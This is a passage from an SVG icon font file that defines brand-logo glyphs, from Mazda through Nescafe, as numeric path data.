<glyph glyph-name="brand-mazda" horiz-adv-x="1000" unicode="&#xe907;" d="M527 756c66-1 159-9 247-44 134-52 206-151 222-293 7-60 5-120-7-179-27-122-99-207-215-248-181-63-365-65-546 0-138 49-209 155-224 299-7 65-5 130 13 193 38 136 133 212 265 247 71 19 144 25 245 25z m343-322c-63-23-122-45-183-66-70-25-123-70-159-134-9-17-18-33-29-52-6 11-10 19-14 27-40 79-101 133-187 158-48 14-95 32-143 48-26 9-27 9-29-19-3-41-2-82 4-122 17-123 89-205 209-235 99-25 200-24 300-5 78 15 146 49 188 120 53 86 54 181 43 280z m-370-128c48 113 140 164 241 203 23 9 45 21 68 30 18 8 16 16 6 30-36 45-82 75-136 90-119 32-239 32-358 0-59-17-107-50-143-101-9-13-9-20 6-26 31-13 61-29 93-40 94-35 173-87 223-186z" />
<glyph glyph-name="brand-mcdonals" horiz-adv-x="1000" unicode="&#xe908;" d="M719 788c-89 0-167-118-219-302-51 184-130 302-219 302-155 0-281-392-281-876h125c0 449 70 813 156 813 87 0 157-336 157-750h125c0 414 70 750 156 750 86 0 156-364 156-813h125c0 484-126 876-281 876z" />
<glyph glyph-name="brand-mercedes" horiz-adv-x="1000" unicode="&#xe909;" d="M1000 350c-1-278-224-501-502-500-275 1-498 225-498 500 0 276 225 500 501 500 276 0 500-225 499-500z m-92-242c-5 2-7 4-9 5-129 52-258 105-388 156-8 3-19 2-27-2-109-44-217-89-326-134-21-9-41-17-64-27 94-145 225-226 396-229 181-4 319 78 418 231z m-401 714c5-35 9-66 14-97 15-107 29-213 45-320 2-9 8-21 15-27 97-76 194-151 292-226 13-11 27-21 42-32 81 166 81 328-18 483-89 140-221 210-390 219z m-420-705c5 3 6 4 8 5 108 88 217 175 325 263 6 5 11 15 12 23 16 102 31 203 47 305 5 35 10 71 16 109-169-9-302-78-391-218-100-157-100-320-17-487z" />
<glyph glyph-name="brand-micromax" horiz-adv-x="1000" unicode="&#xe90a;" d="M819 274c70 36 74 170 10 315-13 32-24 48-41 61-16 12-23 15-37 15-24 0-40-10-51-31-13-24-14-44-8-107 3-32 6-90 8-130 4-91 8-105 32-118 16-10 31-13 54-12 17 1 23 2 33 7z m-408-81c7 4 14 11 19 19 10 16 16 48 14 71-1 16-15 93-25 143-11 50-11 52-7 67 6 22 14 36 24 39 7 2 9 2 15-3 14-12 15-20 14-99-1-108 4-133 34-170 25-29 53-43 79-40 29 4 60 29 68 55 9 31 9 55-4 135-2 11-8 51-14 89-13 88-16 98-27 128-14 36-33 56-57 56-13 0-26-9-47-33-28-30-53-44-81-44-8 0-27 3-42 7-42 10-53 10-72 0-7-3-20-13-30-22-26-24-49-41-61-43-6-2-33-4-60-4-46-2-51-2-67-8-14-6-18-9-26-19-8-13-8-15-9-48-3-92 22-173 63-206 18-15 36-22 56-22 20 0 30 4 42 18 10 10 22 33 22 42 0 7-11 50-26 102-13 45-14 59-5 72 17 25 46 21 55-8 4-14 12-106 12-142 0-84 48-142 114-139 14 1 20 2 29 7z m390-159c72 12 121 33 140 59 8 12 7 39-2 52-8 13-29 27-51 35-25 10-61 18-81 20-40 3-100-9-112-23-3-4-6-7-7-7-10-6-14-54-7-79 11-36 44-61 82-61 7 0 24 2 38 4z m-670-56c-31 9-51 23-66 47-10 15-12 26-41 240-2 11-7 50-13 87-12 84-14 110-7 137 4 19 16 47 24 54 5 5 34 26 41 30 11 6 33 9 61 8 37-2 66 3 88 17 17 10 28 19 37 29 14 15 35 30 50 33 16 4 33 2 68-10 13-4 29-8 36-9 13-1 37 2 37 6 0 1 2 2 4 2 4 0 9 6 13 14 1 3 3 4 5 4s3 1 3 3c0 4 31 40 35 40 2 0 5 1 7 3 3 5 24 13 32 13 4 0 14-2 21-4 25-6 46-28 60-64 10-23 16-34 21-34 2 0 4 3 4 6 0 8 18 31 34 43 19 15 23 17 44 25 15 5 19 6 35 4 37-3 71-30 96-75l8-15 16 1c40 2 53-16 66-93 4-26 14-88 23-138 27-162 33-232 22-270-9-34-38-69-75-90-42-23-90-35-146-35-33-1-37 0-55 6-11 4-29 12-40 19l-20 12-29-3c-16-1-47-4-68-7-21-2-63-7-95-10-68-7-173-18-229-24-62-7-90-7-107-2z" />
<glyph glyph-name="brand-microsoft" horiz-adv-x="1000" unicode="&#xe90b;" d="M0 374h476v476h-476v-476z m1000 0c0 159 0 317 0 476h-476v-476h476z m-1000-524h476v476l-476 0v-476z m524 0h476v476h-476v-476z" />
<glyph glyph-name="brand-mobileme" horiz-adv-x="1000" unicode="&#xe90c;" d="M213-11l-1 0h6c2 0 5 0 7 0s6 0 8 0l501 0c4 0 8 0 11 0 141 0 255 115 255 257 0 141-114 256-254 256-6 0-11 0-16-1-22 120-125 210-250 210-141 0-254-115-254-257 0-3 0-7 0-11h0c-125 0-226-101-226-227 0-121 94-220 213-227z" />
<glyph glyph-name="brand-mobily" horiz-adv-x="1000" unicode="&#xe90d;" d="M749 285c5-23 17-41 39-51 38-17 75-34 113-51l65-29c13-6 23-2 29 11 1 3 2 7 3 11 3 13 2 26 2 39 0 141 0 282 0 422 0 23 1 46-2 69-1 11-3 21-7 32-14 35-38 57-76 63-3 0-6-1-9 1l-4 0c-2 1-5 1-8 1h-655c-2 0-4 0-6 0h-2c-1 0-2 0-3 0h-124c-1 0-2-1-4-1-2 0-4 0-6 0-2 0-4 0-6-1-18-2-34-8-48-20-1-1-1-1-2-1l-2-2-1-1-2-2-1-1-1-1-1-1-1-1-1-1-2-2-1-2h0l-1-1c-5-7-10-15-13-23-9-21-11-43-11-65 0-137 0-274 0-411 0-8 0-16 1-23 5-63 45-109 103-127 25-7 50-13 75-20 31-8 62-16 93-24 139-37 279-73 418-108 54-14 107-27 161-40 28-7 56-13 84-20 12-2 24-5 36-7 16-1 31 11 29 27 0 4-1 7-2 11-5 11-12 18-23 23-85 38-169 76-253 114l-84 38-63 29-145 66c-33 15-65 30-98 44-24 10-45 24-61 45-14 18-22 38-21 61 1 15 1 31 1 47 0 2 1 4-1 5 1 2 0 4 0 6 0 30 0 60 0 90 1 1 1 2 1 4 1 5 2 10 4 15 5 12 13 20 25 25 9 4 19 5 29 5h377c4 0 7 0 11 0 13-1 25-4 35-14 12-11 16-25 16-41 0-65 0-131 0-197 0-5 0-10 1-15z m-720 487z" />
<glyph glyph-name="brand-motorola" horiz-adv-x="1000" unicode="&#xe90e;" d="M1000 350c0-277-225-501-503-500-273 1-497 226-497 501 0 274 225 499 500 499 275 0 500-225 500-500z m-498-93l-4 1-141 467-4 0c-61-201-122-401-183-602 34-4 33-3 41 25 7 24 13 48 22 71 15 39 29 78 61 107 40 36 90 36 127-2 17-17 30-37 42-57 14-22 24-47 37-72 9 19 16 36 26 52 16 26 31 53 51 75 36 39 84 41 124 7 15-14 30-31 39-51 19-42 34-86 49-131 9-28 9-30 40-22-61 200-122 400-183 600l-3 0c-47-156-94-312-141-468z" />
<glyph glyph-name="brand-msi" horiz-adv-x="1000" unicode="&#xe90f;" d="M909 225l69 189s-51 0-102-10l-65-179h98z m-11 240l-13-36c51 10 102 10 102 10l13 36s-51 0-102-10z m-357-195c31-6 62-9 95-9 33 0 57 8 60 30 1 11-9 19-28 29-21 12-39 18-57 30-19 12-27 32-21 53 8 24 24 38 50 51 30 15 54 21 113 21 36 0 72-4 107-10l-12-35c-31 6-63 9-95 9-34 0-58-8-60-30-1-11 9-19 27-29 22-12 39-18 58-30 18-12 26-32 20-53-7-24-24-38-50-51-30-15-54-21-112-21-37 0-73 4-108 10l13 35z m-149-45l57 158c19 52-50 33-66 21-12-10-35-31-43-54l-45-125h-99l57 158c19 52-50 33-66 21-12-10-35-31-43-54l-45-125h-99l91 250c31 0 48-7 62-21 6-5 9-12 11-19 18 11 34 19 45 24 21 8 46 16 78 16s48-7 62-21c5-5 9-12 11-19 18 11 34 19 45 24 21 8 46 16 78 16 31 0 48-7 62-21 15-14 14-40 9-54l-63-175-99 0z" />
<glyph glyph-name="brand-mts" horiz-adv-x="1000" unicode="&#xe910;" d="M870 287c-12 171-68 326-181 455-127 145-257 144-381-4-120-143-180-311-179-497 2-265 193-425 449-385 187 30 308 209 292 431z" />
<glyph glyph-name="brand-myspace" horiz-adv-x="1000" unicode="&#xe911;" d="M728 517c-92 0-167 74-167 166 0 92 75 167 167 167s167-75 167-167c0-92-75-166-167-166z m-137-161c0 92-75 167-167 167s-167-75-167-167c0-4 0-7 1-11h-1v-289h334v289h0c0 4 0 7 0 11z m-167 189c68 0 123 55 123 122s-55 122-123 122-122-54-122-122c0-67 55-122 122-122z m532-286c0 126-102 227-228 227s-228-101-228-227c0-5 1-10 1-15h-1v-394h456v394h-1c0 5 1 10 1 15z m-775 282c-75 0-136-61-136-136 0-4 0-7 0-10h0v-236h273v236h-1c1 4 1 7 1 10 0 75-61 136-137 136z m0 18c56 0 100 45 100 100s-44 100-100 100c-55 0-100-45-100-100s45-100 100-100z" />
<glyph glyph-name="brand-mytv" horiz-adv-x="1000" unicode="&#xe912;" d="M814 313v-298h-306v296c-37-32-74-63-111-94-29 30-59 61-90 92v-294h-307v671h7c96 0 192 0 289 1 4 0 7-2 10-5 29-33 59-66 88-99 2-1 3-3 5-5 14 13 26 26 39 39 22 22 44 44 66 66 2 2 6 3 8 3 99 0 197 0 295 0h7v-7c0-72 0-145 0-218 0-3-1-7-3-10-10-18-19-37-27-56-4-9-10-17-15-25-6-11-13-22-19-33-2-4-3-8-4-12-1-2-2-4-3-7-3-4-7-9-13-9-7 1-12 6-14 12-2 9-4 18-5 27l-7 64c0 5-2 9-4 13-3 6-8 8-15 9-14 2-27-2-38-11-5-4-6-9-6-15-1-14 1-28 6-42 16-42 26-87 38-131 6-19 13-37 21-55 9-21 20-22 41-19 3 0 7 2 9 5 13 12 19 28 18 46-1 15 2 29 8 44 7 20 20 36 29 54 1 1 1 1 3 3z m-261-189c-1-25 5-33 22-36 4 0 7-1 10-2 15-2 30 4 35 15 7 16 12 33 3 51-8 15-9 33-10 50-1 12 0 24 0 36 0 22 0 45 0 67s-2 44-2 66c-1 24-1 48-1 71-1 13 5 18 17 22 4 1 8 2 11 4 5 2 10 5 15 7 2 1 5 3 7 4 11 6 21 14 33 18 12 5 18 14 22 26 4 11-1 20-10 27-7 6-18 6-26 2-10-4-20-11-26-20-3-4-7-8-11-10-12-5-24-10-36-15-4-1-8-4-12-4-5-1-11-1-16-1-4 1-7 3-10 4-12 4-21-1-29-8-9-8-10-17-8-27 1-7 2-13-4-18-4-3-9-7-15-9-12-5-23-11-33-18-9-7-21-12-30-19-17-12-33-23-53-28-15-4-21-16-23-30-1-14 7-24 19-31 11-7 27-3 33 8 9 16 19 31 36 39 5 2 8 5 12 9 3 2 6 5 9 7 15 10 30 19 45 28 6 4 11 2 13-5 1-3 2-6 2-9 2-20 4-40 5-60 0-24 0-47 0-71 0-10-1-21-2-31 0-7 0-14-2-20-4-13-3-26 0-39 5-19 8-38 10-50z m274 562c12-7 24-15 36-21 11-5 14-12 14-23-1-30-1-60-1-90l2-1c1 1 1 3 2 4 5 6 10 13 14 19 9 13 21 22 35 29 25 13 60-1 69-28 2-6 2-12 2-18 0-16-4-30-12-43-7-11-16-18-27-22-11-5-20-11-29-19-15-12-25-27-35-43-5-8-12-15-17-23-2-3-4-7-4-11 0-113 0-227 0-341 0-5-1-8-5-11-15-9-29-19-45-30v7c0 103 0 205 1 308 0 9 5 17 9 25 3 8 9 14 13 21 11 21 22 41 36 59 8 11 16 23 23 34 1 1 2 3 4 4 14 10 25 24 42 30 17 5 27 18 31 35 2 7 3 15 3 22 1 19-11 32-30 35-15 3-28-1-39-12-9-9-17-19-25-29-15-17-29-35-44-52-5-6-9-12-13-18-3-4-6-8-10-14 0 74 0 145 0 217z m-509-671v265c9-9 17-17 24-24 2-1 3-3 4-4 6-6 14-11 17-18s0-16 0-24c0-51 0-103 0-154 0-6-1-10-6-14-12-7-23-16-34-24-1-1-2-2-5-3z m9 663c26-13 54-25 80-38 8-4 14-11 21-17-10-10-19-19-28-29-25 28-50 55-74 83 0 0 0 0 1 1z m170-392c0-13 0-24 0-34 0-1-1-3-2-3 0-1-1-2-2-2-15-18-37-21-58-25-6-2-12-3-19-3 26 22 53 44 81 67z" />
<glyph glyph-name="brand-nasa" horiz-adv-x="1000" unicode="&#xe913;" d="M819 569c-1 1-2 2-2 3-18 28-40 54-64 78-37 36-79 64-127 84-47 20-95 30-146 32-2 0-4 1-6 1h-20c-1 0-2 0-3 0-24-1-47-4-71-9-46-9-89-25-129-50-53-31-96-72-131-122-36-52-59-109-68-171-5-29-7-58-5-87 2-21 4-42 8-63 2-6 1-6-4-9-16-8-32-17-48-26-1 0-2-1-3-2 5-3 9-2 13 0 9 6 18 11 28 15 5 3 11 6 17 9 10-39 24-76 44-111 20-34 45-65 74-93-2-1-3-2-4-3-18-17-36-33-54-49-5-4-4-9-4-14 22 21 44 41 67 61 1-1 2-2 3-3 32-29 67-52 106-70 46-20 93-33 143-36l16-1h27c8 0 17 1 25 2 38 3 74 11 110 24 85 33 153 88 203 165 52 80 72 168 64 263-3 42-13 82-29 121-1 4-4 7-3 10 1 2 4 4 7 7 33 29 65 60 91 96 22 28 40 59 53 92 1 1 1 3 2 4 0 2 0 3 1 5-50-64-114-111-181-153z m46-175c4-42 3-84-5-126-16-79-53-146-110-203-45-45-97-78-157-98-30-10-61-17-93-19-31-2-63-2-95 2-67 10-128 34-182 75-10 8-19 16-29 24-1 1-2 2-3 3 5 4 10 8 15 12 48 40 98 78 149 114 52 37 106 73 160 107 36 23 72 46 107 69 1 0 2 1 3 2-3 4-5 7-7 12-3-2-5-3-7-4-28-18-56-35-84-53-29-18-58-37-86-56-35-24-70-47-105-71-35-26-70-53-103-82-16-14-32-29-48-43-2 1-4 3-6 5-37 36-67 77-87 125-9 21-16 43-21 65-1 3 0 4 2 5 11 4 22 9 32 13 2 0 4 1 5 3l13 13c2 2 3 4 2 7-18-9-37-18-57-28 0 2-1 3-1 5-7 39-9 78-5 118 7 84 39 159 94 223 27 31 57 58 92 80 39 25 82 42 128 52 40 9 81 11 123 7 73-5 139-29 199-72 42-30 78-68 107-112 1-1 1-3 2-5-76-44-156-79-238-111 5-6 10-13 16-20 0 0 1-1 3-1 5-1 11-3 17-4 1 0 3 0 4 1l12 8c3 2 4 2 4-2 0-4 0-9 0-14 61 23 119 51 173 87 1-1 1-1 1-1-1-2-2-3-3-4-16-14-32-28-49-41-23-18-46-35-70-53-16-11-33-22-49-33-1-1-2-1-3-2 3-4 5-8 8-12 70 46 139 94 203 149 3-8 6-15 8-22 11-31 18-62 21-94z m-602-108c-3 3-4 5-4 8 1 36 1 72 0 108 0 6 1 12 7 16 2 2 4 4 7 7 0 0 1 1 1 2h-51c5-5 10-10 14-14 1-1 2-3 2-4 0-25 0-50 0-75 0-1-1-1-1-3-2 3-4 6-5 8-17 28-34 57-50 85-2 2-3 3-6 3-20 0-40 0-60 0h-4c0 0 0-1-1-1 5-4 9-9 14-13 1-1 2-3 2-4 0-39 0-78 0-117 0-1-1-3-2-4-4-4-9-9-13-13-1-1-2-2-3-3h54c-5 6-9 11-13 16-1 1-2 3-2 4 0 25 0 51 0 76 0 1 0 2 1 3 0-1 1-1 1-2 19-31 37-63 56-94 1-2 2-3 5-3 20 0 41 0 61 0 1 0 2 0 4 0-1 1-2 2-3 3-4 4-7 8-11 11z m207 6c-4 10-8 19-12 29-13 34-27 68-40 102-1 3-3 4-6 4-22 0-44 0-67 0-1 0-2 0-4 0 4-5 8-9 12-13 2-2 3-4 2-6-10-34-20-69-30-103-2-11-7-20-16-27-2-1-3-3-5-5 0 0 0-1 1-1h49c-2 2-2 3-3 4-3 3-5 6-8 9-1 2-1 4-1 5 1 5 3 9 4 14 1 2 1 3 4 3 16 0 33 0 49 0 1 0 3-2 3-3 2-3 3-7 5-11 1-2 0-4-1-5-4-4-8-9-13-13 0-1-1-2-2-3h5c20 0 40 0 60 0 9-1 15 6 22 10-1 1-1 1-1 1-2 3-6 6-7 9z m-82 39h-31c-2 0-3 0-2 3 5 17 9 33 14 50 0 0 1 0 1 1 7-18 14-36 22-54-2 0-3 0-4 0z m431-39c-10 23-19 46-28 69-8 21-17 42-25 63-1 2-2 3-4 3-9 0-18 0-26 0-2 0-4-1-5-2-9-6-17-12-26-18-1-1-2-2-3-4-1-5-3-10-4-15l-28-96c0-1 0-2-1-3-5-5-9-9-13-13-1-1-2-2-4-4h51c-4 5-8 9-11 13-1 2-1 4-1 5 1 5 3 10 4 15 1 1 2 2 3 2 17 0 33 0 50 0 2 0 3-1 3-2 2-4 3-8 5-12 1-2 1-4-1-5-3-3-5-5-8-8-3-2-5-5-8-8h97l1 1c-5 5-10 10-15 15-2 1-3 2-3 4z m-116 39c5 18 10 36 15 54l1 0c7-18 14-36 22-54h-38z m-145 54c-7 3-8 11-3 17 6 5 13 7 20 7 18 0 33-7 47-18 1 0 1-1 3-2 0 16-1 31-1 47-2-1-3-2-4-2-4-3-7-5-11-7-1-1-3-1-4-1-13 4-27 6-41 4-23-2-41-12-53-31-10-16-7-37 5-50 9-10 21-14 33-20 2-1 3 0 5 1l32 20c7 4 14 9 22 14-5 2-9 4-14 6-12 5-24 9-36 15z m69-34c-2 1-3 2-5 0-15-10-30-19-45-29-1-1-2-1-3-2 5-3 9-5 13-8 4-4 4-10 0-14-7-6-15-8-23-8-9 1-18 3-27 4-1 1-3 0-4 0-8-5-16-10-23-15-1-1-2-2-2-3 0-4 0-8 1-14 5 5 10 8 16 12 1 1 3 1 4 1 15-5 30-8 46-7 15 1 29 4 42 12 27 17 31 49 10 71z m-354 103c10-29 23-56 38-82 4-6 4-6 9-3 0 0 0 0 1 0l-2 4c-9 19-19 37-27 56-12 27-21 54-26 82-4 20-5 40 0 60 6 28 25 44 55 44 16 1 31-3 46-9 26-10 50-24 73-41 30-21 57-46 82-73 17-18 34-37 50-56 3-4 6-5 11-4-3 4-6 8-9 12l-9 11c-27 32-56 63-88 90-32 27-67 51-106 67-18 7-36 12-55 11-24-1-42-11-52-34-8-17-9-36-8-55 1-27 8-54 17-80z m285-23c5 1 9 1 14 2-4 4-8 8-11 13-2 2-3 2-6 1-32-11-65-23-98-35-9-3-19-6-29-10 5-12 10-25 15-37 0 0 2-1 3-1 18 5 37 10 55 15 1 1 2 2 2 3 2 11 6 20 13 27 12 12 26 20 42 22z m-294-83c-1 0-3-1-3-2 0-9 0-19 0-28l1 0c23 6 46 11 69 17 1 0 2 1 2 2 3 12 7 25 11 38-6-2-12-4-17-6-21-7-42-14-63-21z m208-157c-9 6-17 13-25 19-7 5-13 10-19 16-4-2-7-5-10-7 4-5 8-11 11-16 8-9 16-19 26-26 4-3 8-6 14-6 7 1 11 8 8 14-2 2-3 4-5 6z m203 76c-2 4-3 5-7 3 7-20 13-40 15-61 3-18 3-36-2-53-6-22-21-36-44-40-11-1-21-1-31 1-8 2-17 4-25 6 0-1 0-1 0-1 4-1 7-2 10-3 17-4 33-8 51-6 21 3 36 15 43 35 5 15 6 31 5 47-2 25-8 49-15 72z m-311 38c-1 0-2 1-3 1-2 0-5 0-7 0l-1-1c18-24 36-47 54-71 3 2 6 4 8 6 0 0 0 0 0 1-17 21-34 42-51 64z m302-12c-10 24-23 47-36 69-7 13-16 24-24 37-1 2-6 4-9 4 27-37 48-76 66-119 5 4 5 4 3 9z m-488 24c-9-3-17-7-26-10 0-1-1-2-1-2 0-5 0-9 0-13 0-2 1-5 4-4 12 4 23 7 36 11-4 6-7 12-11 17 0 1-2 1-2 1z m177 256c0-2 0-3-1-5 0-1 0-2-1-3-3-2-7-4-9-5 2-2 5-4 7-5 5-2 2-6 5-9 0 8 4 13 12 14-8 0-12 5-13 13z m429-348c-3 3-3 6-5 10 0-9-6-11-11-13 5-3 11-6 12-14 0 8 4 12 12 13-3 2-6 2-8 4z m-239 446c1 8 6 12 13 13-8 1-11 6-13 13 0-8-5-12-13-13 10-2 11-4 13-13z m-235-612c0-8-5-12-13-13 9-1 13-5 13-13 2 3 1 6 4 9 3 3 6 3 9 4-8 1-11 6-13 13z m432 84c0-8-6-11-13-13 8-1 12-6 13-14 1 9 5 13 13 14-8 0-12 5-13 13z m-188 252c10 4 21 7 31 11-14 4-30-2-31-11z m-209-268c0 2-1 4-4 4-2 0-4-2-4-4 0-3 2-4 4-4 2 0 5 2 4 4z m328 84c2 0 4 2 4 4 0 2-2 5-4 4-2 0-4-1-4-4 0-2 2-4 4-4z m118-14c-2 0-4-2-4-5 0-2 2-3 4-3 2 0 4 2 4 4 0 2-1 4-4 4z m-586-28c-2 0-4-2-4-4 0-3 2-4 4-4 3 0 4 1 4 4 1 2-1 4-4 4z m11-36c-2-1-4-2-4-5 0-2 2-4 4-4 3 0 4 2 4 4 1 3-1 5-4 5z m222 545c3 0 4 1 5 4-1 2-2 4-4 4-3 0-4-1-5-4 0-2 2-4 4-4z m105-85c0-3 1-4 4-4 2 0 4 0 4 3 0 3-1 4-4 5-2 0-4-2-4-4z m-57 79c3 0 4 2 4 4 0 3-2 4-4 4-2 0-4-1-4-4 0-2 2-4 4-4z m182-486c0-2 2-4 4-4 3 0 5 2 5 5-1 2-2 3-4 3-3 0-5-2-5-4z m-354 3c-2 0-3-1-3-4-1-2 1-4 4-4 2 0 4 2 4 4 0 2-2 5-5 4z m419 24c2 0 4 2 4 4 0 3-1 4-4 4-2 1-4-1-4-4 0-2 1-4 4-4z m-227 87c3 2 5 4 8 5-3 3-6 5-9 7 1-4 1-7 1-12z m-122 345c1 1 3 2 3 3 0 1-1 3-2 4h-2c-1-1-2-2-2-4 0-1 2-3 3-3z m260-453v1c-1 1-2 3-4 3-1 0-2-2-3-4 0-1 2-2 4-3 1 1 2 2 3 3z m-180 532c1 1 3 2 3 3 0 2-2 4-3 4-1-1-3-2-3-3-1-2 1-3 2-4h1z m-264-579c-1 0-3-2-3-4 0 0 2-2 3-2 1 0 3 1 4 2v2c-2 0-3 2-4 2z m126 408h-2c-1-1-2-3-2-4 0-1 1-3 3-3 1-1 3 1 3 3 0 1-2 3-2 4z m78 79c1 0 2 1 4 2v2c-2 1-3 2-4 2-1 0-3-2-3-3 0-1 2-3 3-3z m83-1c-2 0-3-1-4-2l0-1c1-1 2-3 3-3 2 0 3 2 4 3 0 1-2 3-3 3z m-92 7c1 1 2 3 2 4 0 1-2 3-3 3-1 0-3-2-3-3 0-1 1-3 2-4 1 0 1 0 2 0z m124-509c-1-1-2-3-2-4 0-1 2-3 2-3 2 0 4 2 4 3 0 1-2 3-2 4-1 0-1 0-2 0z m250 60c-1-2-2-3-2-4 0-1 2-3 3-3 1 0 3 2 3 3 0 1-1 2-2 4h-2z m-36-43c1 0 2 2 3 3v1c-1 1-2 3-4 3-2 0-3-2-3-4 1-1 3-3 4-3z m-93-3c1 0 3 1 4 2 0 0 0 1 0 1-1 1-2 3-3 3-1 0-4-2-3-3 0-1 1-3 2-3z m-294-52c-1-1-2-3-2-4-1-2 1-4 3-3 1 0 3 2 3 3 0 2-2 3-3 4 0 0-1 0-1 0z m-46 2c1 0 2 1 4 2v2c-2 1-3 2-4 2-1 0-3-2-3-3 0-1 2-3 3-3z m462 41c0-1-2-3-2-4 0-1 2-3 3-3 1 0 3 2 3 3 0 2-1 3-2 4-1 0-1 0-2 0z m-449 127c1 0 3 2 3 3 0 1-1 2-2 4 0 0-1 0-1 0-1-2-3-3-3-4 0-1 2-3 3-3z m343-202c-1-1-3-3-3-4 0-1 2-3 3-3 1 0 3 2 4 3v1c-1 1-3 3-4 3z m-218 41c0-1-2-2-2-4 0-1 2-3 3-3 1 1 3 2 3 4 1 1-1 2-2 3h-2z m12 544c2 1 3 2 3 3 0 2-1 3-2 4h-2c0-1-2-2-2-4 0-2 1-3 3-3z m279-405c-1 0-3 2-4 2-1 0-3-2-3-3 0-1 2-3 3-3 1 0 3 1 4 2 0 1 0 1 0 2z m-458-91c-1 0-3-2-3-3 0-1 1-3 2-4h2c0 1 2 3 2 4 0 1-2 3-3 3z m36 419c0-1 2-3 3-3 1 0 3 1 4 2v2c-1 0-3 2-4 2-1 0-3-2-3-3z m-147-403c-1 0-3-2-3-3-1-2 1-4 3-3 1 0 2 1 4 2 0 1 0 1 0 2-2 1-3 2-4 2z m226 458c-1-2 1-4 3-3 1 0 2 1 4 2v2c-2 1-3 2-4 2-2 0-3-2-3-3z m314-195h-8c-1 0-1 0-2 0 1-2 2-3 4-5 2 2 3 3 6 5z m-341-85c8 2 16 4 24 6-4 11-8 22-13 33-4-13-7-26-11-39z" />
<glyph glyph-name="brand-natgeo" horiz-adv-x="1000" unicode="&#xe914;" d="M849 349c0 158 0 316 1 474 0 20-3 27-25 27-217-1-434-1-650 0-19 0-24-5-24-23 1-318 1-636 0-954 0-19 6-23 24-23 217 1 434 1 650 0 20 0 25 6 25 25-1 158-1 316-1 474z m-123-397c-151 0-302 0-453 0-17-1-20 5-20 21 0 251 0 502 0 753 0 17 3 23 21 23 151-1 301-1 451 0 20 0 23-7 23-24-1-124-1-249-1-373 0-126 0-252 1-378 0-17-4-23-22-22z" />
<glyph glyph-name="brand-nbc" horiz-adv-x="1000" unicode="&#xe915;" d="M433 138c-17 42-34 81-50 119-32 77-65 153-97 230-28 67 11 137 83 149 68 11 130-52 120-120-18-121-35-242-52-362-1-5-2-9-4-16z m122 378c-10 8-21 5-32 4-11 0-13 3-13 14 1 65 65 115 128 100 73-17 102-87 76-147-46-110-92-219-139-328-1-3-2-5-3-7-2-2-4-5-6-5-4 1-3 4-3 7-15 99-29 198-44 297-4 24 1 48 29 59 2 1 6 2 7 6z m-127-414c-18 13-36 25-54 38-81 56-163 112-244 169-47 33-61 92-33 140 22 37 55 55 97 53 42-3 73-24 90-61 20-43 38-86 56-129 28-65 57-129 85-194 2-5 5-9 3-16z m141 2c25 57 51 114 75 172 12 26 23 51 34 77 11 23 20 47 30 70 4 8 7 17 11 25 21 38 62 58 108 53 40-5 75-36 86-77 11-42-3-87-38-112-99-69-199-137-298-206-2-1-4-4-8-2z m-126-39c-5-3-10-1-15-1-107-1-214-1-321 0-46 0-86 28-101 70-15 43-1 92 33 119 37 29 87 33 126 7 91-62 181-125 271-188 3-1 7-3 7-7z m109-1c50 35 97 68 144 100 45 31 89 62 134 93 68 46 155 9 169-71 10-60-39-122-100-122-112-1-225 0-337 0-2 0-4 0-10 0z" />
<glyph glyph-name="brand-nescafe" horiz-adv-x="1000" unicode="&#xe916;" d="M429 333c-8 4-23 12-30 15-10 5-12 17-6 23 11 11 40 8 50-12 2-4 2-6 2-6h1v1l11 38s-1 1-6 4c0 0-14 10-40 10-26 0-62-13-64-52-1-27 18-43 30-49 16-8 34-14 41-24 5-8 2-26-23-26-34 0-41 31-41 31h-1l-9-42s2-3 8-6c6-3 26-11 46-11 18 1 64 4 67 56 0 11-4 35-36 50z m315-85c-2 6-4 12-16 50-29 87-35 103-35 103h-57v-1c8-1 8-12 6-17 0 0-43-136-47-151h43v1c0 0-7 4-6 14 1 8 6 25 6 25h46c3-10 4-15 6-19 6-17 10-20 10-20h56v0c-6 1-10 10-12 15z m-69 51h-31l1 1 15 53v1l0-1c2-5 8-28 16-53l0-1h-1z m290 130c16 10 20 27 18 43v0s-19-17-101-48v0c0 0 63-6 83 5z m-366-157c-1-2-10-18-37-13-17 3-43 18-42 69 2 36 25 48 38 50 11 1 30-4 36-24l1 0h0l14 36s-1 2-4 4c0 0-15 14-49 12-34-1-84-24-83-91 1-66 49-88 76-88 28 0 42 11 51 45l-1 0z m-287-10c-17-3-38-1-42 0h0v46h0c5 0 28 0 36 0 9 0 9-5 9-5v0h1l6 34h-52l0-1v37h0c5 0 25-1 37-1 15 0 17-9 18-12v-1h0v1l6 41h-121v-1c14-1 12-58 12-58v-89c0-11 2-20 3-21h103l11 44-1 1c-1-1-5-10-26-15z m687 15c0-1-4-10-25-15-17-3-38-1-42 0h0v46h0c4 0 27 0 36 0 8 0 9-5 9-5v0h1l5 34h-51l0-1v37h0c4 0 25-1 37-1 14 0 16-9 17-12 0 0 0 0 0-1h1v1l6 41h-121v-1c13-1 11-58 11-58v-89c0-11 2-20 3-21h104l10 44-1 1z m-251 123c13-2 11-58 11-58v-91s0-14 3-18h55v0c0 1-10 2-10 22v53h1c4 0 25 0 34 0 8 0 9-5 9-5v0h1s3 23 5 34h-49l-1-1v37h1c4 0 23-1 35-1 14 0 16-9 17-12v-1h1v1c2 12 6 41 6 41h-119v-1z m-555 26h650s21 1 37 33l-2 1c0-2-2-2-9-2h-726v-1s10-7 10-51c0-37 1-77 1-77v-12c0 1-1 2-1 2-3 5-47 77-54 88 0 0-20 30-30 41-9 10-17 10-21 10h-48v-2c1 0 12-6 12-55v-111c0-51-12-57-12-57v0h44c8 0 8 5 8 7v50c0 40-1 76-1 82v1c0-1 1-1 1-1 0-1 8-9 48-71 33-52 30-47 34-53 4-6 8-15 20-15h42s-3 10-3 43l0 150z" />
